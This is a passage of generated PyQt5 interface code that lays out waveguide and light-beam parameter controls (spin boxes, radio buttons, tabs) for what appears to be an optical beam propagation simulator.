self.verticalLayout_guide.addWidget(self.frame_window) spacerItem = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum) self.verticalLayout_guide.addItem(spacerItem) self.label_guides_information = QtWidgets.QLabel(self.tabWidget_guide) self.label_guides_information.setMinimumSize(QtCore.QSize(190, 62)) self.label_guides_information.setMaximumSize(QtCore.QSize(16777215, 30)) self.label_guides_information.setObjectName("label_guides_information") self.verticalLayout_guide.addWidget(self.label_guides_information) self.frame_guides = QtWidgets.QFrame(self.tabWidget_guide) 
self.frame_guides.setMinimumSize(QtCore.QSize(270, 0)) self.frame_guides.setMaximumSize(QtCore.QSize(350, 16777215)) self.frame_guides.setFrameShape(QtWidgets.QFrame.Box) self.frame_guides.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_guides.setObjectName("frame_guides") self.formLayout_6 = QtWidgets.QFormLayout(self.frame_guides) self.formLayout_6.setObjectName("formLayout_6") self.comboBox_guide = QtWidgets.QComboBox(self.frame_guides) self.comboBox_guide.setMaximumSize(QtCore.QSize(100, 16777215)) self.comboBox_guide.setObjectName("comboBox_guide") self.formLayout_6.setWidget(0, QtWidgets.QFormLayout.SpanningRole, self.comboBox_guide) self.Qframe_guide_create = QtWidgets.QFrame(self.frame_guides) self.Qframe_guide_create.setFrameShape(QtWidgets.QFrame.StyledPanel) self.Qframe_guide_create.setFrameShadow(QtWidgets.QFrame.Raised) self.Qframe_guide_create.setObjectName("Qframe_guide_create") self.gridLayout_2 = QtWidgets.QGridLayout(self.Qframe_guide_create) self.gridLayout_2.setObjectName("gridLayout_2") self.pushButton_save_guide = QtWidgets.QPushButton(self.Qframe_guide_create) self.pushButton_save_guide.setObjectName("pushButton_save_guide") self.gridLayout_2.addWidget(self.pushButton_save_guide, 1, 0, 1, 1) self.pushButton_delete_guide = QtWidgets.QPushButton(self.Qframe_guide_create) self.pushButton_delete_guide.setObjectName("pushButton_delete_guide") self.gridLayout_2.addWidget(self.pushButton_delete_guide, 0, 1, 1, 1) self.pushButton_create_guide = QtWidgets.QPushButton(self.Qframe_guide_create) self.pushButton_create_guide.setObjectName("pushButton_create_guide") self.gridLayout_2.addWidget(self.pushButton_create_guide, 0, 0, 1, 1) self.pushButton_cancel_guide = QtWidgets.QPushButton(self.Qframe_guide_create) self.pushButton_cancel_guide.setStatusTip("") self.pushButton_cancel_guide.setObjectName("pushButton_cancel_guide") self.gridLayout_2.addWidget(self.pushButton_cancel_guide, 1, 1, 1, 1) self.formLayout_6.setWidget(1, 
QtWidgets.QFormLayout.SpanningRole, self.Qframe_guide_create) self.label_width = QtWidgets.QLabel(self.frame_guides) self.label_width.setMinimumSize(QtCore.QSize(40, 0)) self.label_width.setObjectName("label_width") self.formLayout_6.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_width) self.doubleSpinBox_width = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_width.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_width.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_width.setDecimals(3) self.doubleSpinBox_width.setMinimum(0.0) self.doubleSpinBox_width.setMaximum(10000.0) self.doubleSpinBox_width.setProperty("value", 8.0) self.doubleSpinBox_width.setObjectName("doubleSpinBox_width") self.formLayout_6.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_width) self.label_offset_guide = QtWidgets.QLabel(self.frame_guides) self.label_offset_guide.setMinimumSize(QtCore.QSize(40, 0)) self.label_offset_guide.setObjectName("label_offset_guide") self.formLayout_6.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_offset_guide) self.doubleSpinBox_offset_guide = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_offset_guide.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_offset_guide.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_offset_guide.setDecimals(3) self.doubleSpinBox_offset_guide.setMinimum(-5000.0) self.doubleSpinBox_offset_guide.setMaximum(5000.0) self.doubleSpinBox_offset_guide.setObjectName("doubleSpinBox_offset_guide") self.formLayout_6.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_offset_guide) self.label_dn = QtWidgets.QLabel(self.frame_guides) self.label_dn.setMinimumSize(QtCore.QSize(40, 0)) self.label_dn.setObjectName("label_dn") self.formLayout_6.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_dn) self.doubleSpinBox_dn = QtWidgets.QDoubleSpinBox(self.frame_guides) 
self.doubleSpinBox_dn.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_dn.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_dn.setDecimals(6) self.doubleSpinBox_dn.setMaximum(1000.0) self.doubleSpinBox_dn.setProperty("value", 0.001) self.doubleSpinBox_dn.setObjectName("doubleSpinBox_dn") self.formLayout_6.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_dn) self.checkBox_n_imag = QtWidgets.QCheckBox(self.frame_guides) self.checkBox_n_imag.setMinimumSize(QtCore.QSize(60, 0)) self.checkBox_n_imag.setChecked(True) self.checkBox_n_imag.setObjectName("checkBox_n_imag") self.formLayout_6.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.checkBox_n_imag) self.doubleSpinBox_n_imag = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_n_imag.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_n_imag.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_n_imag.setDecimals(6) self.doubleSpinBox_n_imag.setMaximum(20.0) self.doubleSpinBox_n_imag.setObjectName("doubleSpinBox_n_imag") self.formLayout_6.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_n_imag) self.label_lost = QtWidgets.QLabel(self.frame_guides) self.label_lost.setMinimumSize(QtCore.QSize(60, 0)) self.label_lost.setObjectName("label_lost") self.formLayout_6.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_lost) self.doubleSpinBox_lost = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_lost.setEnabled(False) self.doubleSpinBox_lost.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_lost.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_lost.setDecimals(5) self.doubleSpinBox_lost.setMaximum(10000.0) self.doubleSpinBox_lost.setProperty("value", 1.0) self.doubleSpinBox_lost.setObjectName("doubleSpinBox_lost") self.formLayout_6.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_lost) self.label = 
QtWidgets.QLabel(self.frame_guides) self.label.setMinimumSize(QtCore.QSize(130, 0)) self.label.setLineWidth(1) self.label.setObjectName("label") self.formLayout_6.setWidget(8, QtWidgets.QFormLayout.SpanningRole, self.label) self.radioButton_gaussian = QtWidgets.QRadioButton(self.frame_guides) self.radioButton_gaussian.setMinimumSize(QtCore.QSize(70, 0)) self.radioButton_gaussian.setChecked(True) self.radioButton_gaussian.setObjectName("radioButton_gaussian") self.formLayout_6.setWidget(9, QtWidgets.QFormLayout.LabelRole, self.radioButton_gaussian) self.spinBox_gauss_pow = QtWidgets.QSpinBox(self.frame_guides) self.spinBox_gauss_pow.setMinimumSize(QtCore.QSize(70, 0)) self.spinBox_gauss_pow.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_gauss_pow.setSuffix("") self.spinBox_gauss_pow.setMinimum(1) self.spinBox_gauss_pow.setMaximum(10) self.spinBox_gauss_pow.setSingleStep(1) self.spinBox_gauss_pow.setProperty("value", 4) self.spinBox_gauss_pow.setObjectName("spinBox_gauss_pow") self.formLayout_6.setWidget(9, QtWidgets.QFormLayout.FieldRole, self.spinBox_gauss_pow) self.radioButton_squared = QtWidgets.QRadioButton(self.frame_guides) self.radioButton_squared.setMinimumSize(QtCore.QSize(70, 0)) self.radioButton_squared.setObjectName("radioButton_squared") self.formLayout_6.setWidget(10, QtWidgets.QFormLayout.LabelRole, self.radioButton_squared) self.tabWidget_morphology_guide = QtWidgets.QTabWidget(self.frame_guides) self.tabWidget_morphology_guide.setMinimumSize(QtCore.QSize(250, 0)) self.tabWidget_morphology_guide.setToolTip("") self.tabWidget_morphology_guide.setObjectName("tabWidget_morphology_guide") self.tab_array = QtWidgets.QWidget() self.tab_array.setObjectName("tab_array") self.formLayout = QtWidgets.QFormLayout(self.tab_array) self.formLayout.setObjectName("formLayout") self.label_nb_p = QtWidgets.QLabel(self.tab_array) self.label_nb_p.setMinimumSize(QtCore.QSize(90, 0)) self.label_nb_p.setObjectName("label_nb_p") 
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_nb_p) self.spinBox_nb_p = QtWidgets.QSpinBox(self.tab_array) self.spinBox_nb_p.setMinimumSize(QtCore.QSize(40, 0)) self.spinBox_nb_p.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_nb_p.setMaximum(1000) self.spinBox_nb_p.setProperty("value", 11) self.spinBox_nb_p.setObjectName("spinBox_nb_p") self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.spinBox_nb_p) self.label_p = QtWidgets.QLabel(self.tab_array) self.label_p.setMinimumSize(QtCore.QSize(120, 0)) self.label_p.setObjectName("label_p") self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_p) self.doubleSpinBox_p = QtWidgets.QDoubleSpinBox(self.tab_array) self.doubleSpinBox_p.setMinimumSize(QtCore.QSize(80, 0)) self.doubleSpinBox_p.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_p.setDecimals(3) self.doubleSpinBox_p.setMaximum(10000.0) self.doubleSpinBox_p.setProperty("value", 15.0) self.doubleSpinBox_p.setObjectName("doubleSpinBox_p") self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_p) self.doubleSpinBox_offset_guide_z = QtWidgets.QDoubleSpinBox(self.tab_array) self.doubleSpinBox_offset_guide_z.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_offset_guide_z.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_offset_guide_z.setDecimals(3) self.doubleSpinBox_offset_guide_z.setMaximum(100000.0) self.doubleSpinBox_offset_guide_z.setObjectName("doubleSpinBox_offset_guide_z") self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_offset_guide_z) self.label_offset_guide_z = QtWidgets.QLabel(self.tab_array) self.label_offset_guide_z.setMinimumSize(QtCore.QSize(40, 0)) self.label_offset_guide_z.setObjectName("label_offset_guide_z") self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_offset_guide_z) 
self.doubleSpinBox_guide_length = QtWidgets.QDoubleSpinBox(self.tab_array) self.doubleSpinBox_guide_length.setMinimumSize(QtCore.QSize(100, 0)) self.doubleSpinBox_guide_length.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_guide_length.setDecimals(3) self.doubleSpinBox_guide_length.setMaximum(100000.0) self.doubleSpinBox_guide_length.setProperty("value", 100000.0) self.doubleSpinBox_guide_length.setObjectName("doubleSpinBox_guide_length") self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_guide_length) self.label_guide_length = QtWidgets.QLabel(self.tab_array) self.label_guide_length.setMinimumSize(QtCore.QSize(40, 0)) self.label_guide_length.setObjectName("label_guide_length") self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_guide_length) self.tabWidget_morphology_guide.addTab(self.tab_array, "") self.tab_curved = QtWidgets.QWidget() self.tab_curved.setObjectName("tab_curved") self.formLayout_2 = QtWidgets.QFormLayout(self.tab_curved) self.formLayout_2.setObjectName("formLayout_2") self.label_curve = QtWidgets.QLabel(self.tab_curved) self.label_curve.setMinimumSize(QtCore.QSize(60, 0)) self.label_curve.setObjectName("label_curve") self.formLayout_2.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_curve) self.doubleSpinBox_curve = QtWidgets.QDoubleSpinBox(self.tab_curved) self.doubleSpinBox_curve.setMinimumSize(QtCore.QSize(140, 0)) self.doubleSpinBox_curve.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_curve.setDecimals(3) self.doubleSpinBox_curve.setMinimum(-100000000.0) self.doubleSpinBox_curve.setMaximum(100000000.0) self.doubleSpinBox_curve.setProperty("value", 40.0) self.doubleSpinBox_curve.setObjectName("doubleSpinBox_curve") self.formLayout_2.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_curve) self.label_half_delay = QtWidgets.QLabel(self.tab_curved) 
self.label_half_delay.setMinimumSize(QtCore.QSize(60, 0)) self.label_half_delay.setObjectName("label_half_delay") self.formLayout_2.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_half_delay) self.doubleSpinBox_half_delay = QtWidgets.QDoubleSpinBox(self.tab_curved) self.doubleSpinBox_half_delay.setMinimumSize(QtCore.QSize(90, 0)) self.doubleSpinBox_half_delay.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_half_delay.setDecimals(3) self.doubleSpinBox_half_delay.setMaximum(100000.0) self.doubleSpinBox_half_delay.setProperty("value", 1000.0) self.doubleSpinBox_half_delay.setObjectName("doubleSpinBox_half_delay") self.formLayout_2.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_half_delay) self.label_distance_factor = QtWidgets.QLabel(self.tab_curved) self.label_distance_factor.setMinimumSize(QtCore.QSize(60, 0)) self.label_distance_factor.setObjectName("label_distance_factor") self.formLayout_2.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_distance_factor) self.doubleSpinBox_distance_factor = QtWidgets.QDoubleSpinBox(self.tab_curved) self.doubleSpinBox_distance_factor.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_distance_factor.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_distance_factor.setDecimals(3) self.doubleSpinBox_distance_factor.setMaximum(10000.0) self.doubleSpinBox_distance_factor.setProperty("value", 1.2) self.doubleSpinBox_distance_factor.setObjectName("doubleSpinBox_distance_factor") self.formLayout_2.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_distance_factor) self.tabWidget_morphology_guide.addTab(self.tab_curved, "") self.formLayout_6.setWidget(12, QtWidgets.QFormLayout.SpanningRole, self.tabWidget_morphology_guide) self.verticalLayout_guide.addWidget(self.frame_guides) self.calculateButton_guide = QtWidgets.QPushButton(self.tabWidget_guide) self.calculateButton_guide.setMaximumSize(QtCore.QSize(350, 
16777215)) self.calculateButton_guide.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor)) self.calculateButton_guide.setObjectName("calculateButton_guide") self.verticalLayout_guide.addWidget(self.calculateButton_guide) spacerItem1 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum) self.verticalLayout_guide.addItem(spacerItem1) spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout_guide.addItem(spacerItem2) self.horizontalLayout_2.addLayout(self.verticalLayout_guide) self.plot_guide = QtWidgets.QVBoxLayout() self.plot_guide.setObjectName("plot_guide") self.horizontalLayout_2.addLayout(self.plot_guide) self.tabWidget_main.addTab(self.tabWidget_guide, "") self.tabWidget_light = QtWidgets.QWidget() self.tabWidget_light.setObjectName("tabWidget_light") self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.tabWidget_light) self.horizontalLayout_4.setObjectName("horizontalLayout_4") self.verticalLayout_light = QtWidgets.QVBoxLayout() self.verticalLayout_light.setObjectName("verticalLayout_light") self.label_light_informations = QtWidgets.QLabel(self.tabWidget_light) self.label_light_informations.setMinimumSize(QtCore.QSize(0, 62)) self.label_light_informations.setMaximumSize(QtCore.QSize(16777215, 30)) self.label_light_informations.setObjectName("label_light_informations") self.verticalLayout_light.addWidget(self.label_light_informations) self.frame_light = QtWidgets.QFrame(self.tabWidget_light) self.frame_light.setMinimumSize(QtCore.QSize(120, 0)) self.frame_light.setMaximumSize(QtCore.QSize(120, 16777215)) self.frame_light.setFrameShape(QtWidgets.QFrame.Box) self.frame_light.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_light.setObjectName("frame_light") self.formLayout_lo_theta = QtWidgets.QFormLayout(self.frame_light) self.formLayout_lo_theta.setObjectName("formLayout_lo_theta") self.label_theta_ext = QtWidgets.QLabel(self.frame_light) 
self.label_theta_ext.setObjectName("label_theta_ext") self.formLayout_lo_theta.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_theta_ext) self.doubleSpinBox_theta_ext = QtWidgets.QDoubleSpinBox(self.frame_light) self.doubleSpinBox_theta_ext.setMinimumSize(QtCore.QSize(60, 0)) self.doubleSpinBox_theta_ext.setMaximumSize(QtCore.QSize(60, 16777215)) self.doubleSpinBox_theta_ext.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_theta_ext.setMinimum(-28.0) self.doubleSpinBox_theta_ext.setMaximum(28.0) self.doubleSpinBox_theta_ext.setObjectName("doubleSpinBox_theta_ext") self.formLayout_lo_theta.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_theta_ext) self.verticalLayout_light.addWidget(self.frame_light) spacerItem3 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum) self.verticalLayout_light.addItem(spacerItem3) self.frame_beam = QtWidgets.QFrame(self.tabWidget_light) self.frame_beam.setMinimumSize(QtCore.QSize(250, 0)) self.frame_beam.setMaximumSize(QtCore.QSize(350, 16777215)) self.frame_beam.setFrameShape(QtWidgets.QFrame.Box) self.frame_beam.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_beam.setObjectName("frame_beam") self.gridLayout_5 = QtWidgets.QGridLayout(self.frame_beam) self.gridLayout_5.setObjectName("gridLayout_5") self.label_offset_light = QtWidgets.QLabel(self.frame_beam) self.label_offset_light.setEnabled(True) self.label_offset_light.setMaximumSize(QtCore.QSize(60, 16777215)) self.label_offset_light.setObjectName("label_offset_light") self.gridLayout_5.addWidget(self.label_offset_light, 4, 0, 1, 1) self.label_intensity = QtWidgets.QLabel(self.frame_beam) self.label_intensity.setMaximumSize(QtCore.QSize(60, 16777215)) self.label_intensity.setObjectName("label_intensity") self.gridLayout_5.addWidget(self.label_intensity, 5, 0, 1, 1) self.radioButton_mode = QtWidgets.QRadioButton(self.frame_beam) 
self.radioButton_mode.setMaximumSize(QtCore.QSize(70, 16777215)) self.radioButton_mode.setObjectName("radioButton_mode") self.gridLayout_5.addWidget(self.radioButton_mode, 11, 0, 1, 1) self.radioButton_gaussian_light = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_gaussian_light.setEnabled(True) self.radioButton_gaussian_light.setMaximumSize(QtCore.QSize(70, 16777215)) self.radioButton_gaussian_light.setChecked(True) self.radioButton_gaussian_light.setObjectName("radioButton_gaussian_light") self.gridLayout_5.addWidget(self.radioButton_gaussian_light, 7, 0, 1, 2) self.radioButton_squared_light = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_squared_light.setMaximumSize(QtCore.QSize(70, 16777215)) self.radioButton_squared_light.setChecked(False) self.radioButton_squared_light.setObjectName("radioButton_squared_light") self.gridLayout_5.addWidget(self.radioButton_squared_light, 9, 0, 1, 2) spacerItem4 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem4, 6, 0, 1, 1) spacerItem5 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem5, 8, 0, 1, 1) spacerItem6 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem6, 10, 0, 1, 1) self.label_guide_nbr_ref = QtWidgets.QLabel(self.frame_beam) self.label_guide_nbr_ref.setMaximumSize(QtCore.QSize(90, 16777215)) self.label_guide_nbr_ref.setObjectName("label_guide_nbr_ref") self.gridLayout_5.addWidget(self.label_guide_nbr_ref, 12, 0, 1, 1) self.label_fwhm = QtWidgets.QLabel(self.frame_beam) self.label_fwhm.setMinimumSize(QtCore.QSize(30, 0)) self.label_fwhm.setMaximumSize(QtCore.QSize(40, 16777215)) self.label_fwhm.setObjectName("label_fwhm") self.gridLayout_5.addWidget(self.label_fwhm, 2, 0, 1, 1) self.doubleSpinBox_fwhm = QtWidgets.QDoubleSpinBox(self.frame_beam) 
self.doubleSpinBox_fwhm.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_fwhm.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_fwhm.setDecimals(3) self.doubleSpinBox_fwhm.setMaximum(10000.0) self.doubleSpinBox_fwhm.setProperty("value", 8.0) self.doubleSpinBox_fwhm.setObjectName("doubleSpinBox_fwhm") self.gridLayout_5.addWidget(self.doubleSpinBox_fwhm, 2, 1, 1, 5) self.comboBox_light = QtWidgets.QComboBox(self.frame_beam) self.comboBox_light.setMaximumSize(QtCore.QSize(100, 16777215)) self.comboBox_light.setToolTipDuration(-1) self.comboBox_light.setObjectName("comboBox_light") self.gridLayout_5.addWidget(self.comboBox_light, 0, 0, 1, 1) self.checkBox_offset_light = QtWidgets.QCheckBox(self.frame_beam) self.checkBox_offset_light.setMaximumSize(QtCore.QSize(100, 16777215)) self.checkBox_offset_light.setChecked(True) self.checkBox_offset_light.setObjectName("checkBox_offset_light") self.gridLayout_5.addWidget(self.checkBox_offset_light, 3, 0, 1, 1) self.label_lobe_size = QtWidgets.QLabel(self.frame_beam) self.label_lobe_size.setMaximumSize(QtCore.QSize(70, 16777215)) self.label_lobe_size.setObjectName("label_lobe_size") self.gridLayout_5.addWidget(self.label_lobe_size, 19, 0, 1, 1) self.radioButton_airy = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_airy.setMaximumSize(QtCore.QSize(50, 16777215)) self.radioButton_airy.setObjectName("radioButton_airy") self.gridLayout_5.addWidget(self.radioButton_airy, 17, 0, 1, 1) self.label_zero_cut = QtWidgets.QLabel(self.frame_beam) self.label_zero_cut.setMaximumSize(QtCore.QSize(50, 16777215)) self.label_zero_cut.setObjectName("label_zero_cut") self.gridLayout_5.addWidget(self.label_zero_cut, 18, 0, 1, 1) self.mode_number = QtWidgets.QLCDNumber(self.frame_beam) self.mode_number.setMaximumSize(QtCore.QSize(100, 16777215)) self.mode_number.setObjectName("mode_number") self.gridLayout_5.addWidget(self.mode_number, 13, 1, 1, 1) self.pushButton_mode_number = 
QtWidgets.QPushButton(self.frame_beam) self.pushButton_mode_number.setMaximumSize(QtCore.QSize(90, 16777215)) self.pushButton_mode_number.setObjectName("pushButton_mode_number") self.gridLayout_5.addWidget(self.pushButton_mode_number, 13, 0, 1, 1) self.radioButton_all_modes = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_all_modes.setMaximumSize(QtCore.QSize(70, 16777215)) self.radioButton_all_modes.setObjectName("radioButton_all_modes") self.gridLayout_5.addWidget(self.radioButton_all_modes, 15, 0, 1, 1) spacerItem7 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem7, 16, 0, 1, 1) spacerItem8 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem8, 14, 0, 1, 1) self.spinBox_offset_light_peak = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_offset_light_peak.setMinimumSize(QtCore.QSize(105, 0)) self.spinBox_offset_light_peak.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_offset_light_peak.setSuffix("") self.spinBox_offset_light_peak.setMaximum(10000) self.spinBox_offset_light_peak.setProperty("value", 5) self.spinBox_offset_light_peak.setObjectName("spinBox_offset_light_peak") self.gridLayout_5.addWidget(self.spinBox_offset_light_peak, 3, 1, 1, 5) self.doubleSpinBox_offset_light = QtWidgets.QDoubleSpinBox(self.frame_beam) self.doubleSpinBox_offset_light.setEnabled(False) self.doubleSpinBox_offset_light.setMinimumSize(QtCore.QSize(60, 0)) self.doubleSpinBox_offset_light.setMinimum(-10000.0) self.doubleSpinBox_offset_light.setMaximum(10000.0) self.doubleSpinBox_offset_light.setObjectName("doubleSpinBox_offset_light") self.gridLayout_5.addWidget(self.doubleSpinBox_offset_light, 4, 1, 1, 5) self.label_3 = QtWidgets.QLabel(self.frame_beam) self.label_3.setMinimumSize(QtCore.QSize(40, 0)) self.label_3.setObjectName("label_3") self.gridLayout_5.addWidget(self.label_3, 5, 5, 
1, 1) self.spinBox_irrad_exponent = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_irrad_exponent.setMinimumSize(QtCore.QSize(50, 0)) self.spinBox_irrad_exponent.setProperty("value", 13) self.spinBox_irrad_exponent.setObjectName("spinBox_irrad_exponent") self.gridLayout_5.addWidget(self.spinBox_irrad_exponent, 5, 4, 1, 1) self.label_2 = QtWidgets.QLabel(self.frame_beam) self.label_2.setMinimumSize(QtCore.QSize(25, 0)) self.label_2.setObjectName("label_2") self.gridLayout_5.addWidget(self.label_2, 5, 3, 1, 1) self.spinBox_mode = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_mode.setEnabled(False) self.spinBox_mode.setMinimumSize(QtCore.QSize(30, 0)) self.spinBox_mode.setAutoFillBackground(False) self.spinBox_mode.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_mode.setMaximum(50) self.spinBox_mode.setObjectName("spinBox_mode") self.gridLayout_5.addWidget(self.spinBox_mode, 11, 1, 1, 5) self.spinBox_guide_nbr_ref = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_guide_nbr_ref.setEnabled(False) self.spinBox_guide_nbr_ref.setMinimumSize(QtCore.QSize(30, 0)) self.spinBox_guide_nbr_ref.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_guide_nbr_ref.setObjectName("spinBox_guide_nbr_ref") self.gridLayout_5.addWidget(self.spinBox_guide_nbr_ref, 12, 1, 1, 5) self.spinBox_airy_zero = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_airy_zero.setEnabled(False) self.spinBox_airy_zero.setMinimumSize(QtCore.QSize(40, 0)) self.spinBox_airy_zero.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_airy_zero.setMinimum(1) self.spinBox_airy_zero.setMaximum(10000) self.spinBox_airy_zero.setProperty("value", 10) self.spinBox_airy_zero.setObjectName("spinBox_airy_zero") self.gridLayout_5.addWidget(self.spinBox_airy_zero, 18, 1, 1, 5) self.doubleSpinBox_irrad_significand = QtWidgets.QDoubleSpinBox(self.frame_beam) self.doubleSpinBox_irrad_significand.setMinimumSize(QtCore.QSize(50, 0)) 
self.doubleSpinBox_irrad_significand.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_irrad_significand.setSuffix("") self.doubleSpinBox_irrad_significand.setDecimals(2) self.doubleSpinBox_irrad_significand.setMaximum(9.99) self.doubleSpinBox_irrad_significand.setProperty("value", 1.0) self.doubleSpinBox_irrad_significand.setObjectName("doubleSpinBox_irrad_significand") self.gridLayout_5.addWidget(self.doubleSpinBox_irrad_significand, 5, 1, 1, 2) self.doubleSpinBox_lobe_size = QtWidgets.QDoubleSpinBox(self.frame_beam) self.doubleSpinBox_lobe_size.setEnabled(False) self.doubleSpinBox_lobe_size.setMinimumSize(QtCore.QSize(60, 0)) self.doubleSpinBox_lobe_size.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_lobe_size.setMaximum(10000.0) self.doubleSpinBox_lobe_size.setProperty("value", 8.0) self.doubleSpinBox_lobe_size.setObjectName("doubleSpinBox_lobe_size") self.gridLayout_5.addWidget(self.doubleSpinBox_lobe_size, 19, 1, 1, 5) self.Qframe_beam_create = QtWidgets.QFrame(self.frame_beam) self.Qframe_beam_create.setFrameShape(QtWidgets.QFrame.NoFrame) self.Qframe_beam_create.setFrameShadow(QtWidgets.QFrame.Raised) self.Qframe_beam_create.setObjectName("Qframe_beam_create") self.gridLayout_creat_delete_beam = QtWidgets.QGridLayout(self.Qframe_beam_create) self.gridLayout_creat_delete_beam.setObjectName("gridLayout_creat_delete_beam") self.pushButton_delete_beam = QtWidgets.QPushButton(self.Qframe_beam_create) self.pushButton_delete_beam.setObjectName("pushButton_delete_beam") self.gridLayout_creat_delete_beam.addWidget(self.pushButton_delete_beam, 2, 1, 1, 1) self.pushButton_create_beam = QtWidgets.QPushButton(self.Qframe_beam_create) self.pushButton_create_beam.setObjectName("pushButton_create_beam") self.gridLayout_creat_delete_beam.addWidget(self.pushButton_create_beam, 2, 0, 1, 1) self.pushButton_save_beam = 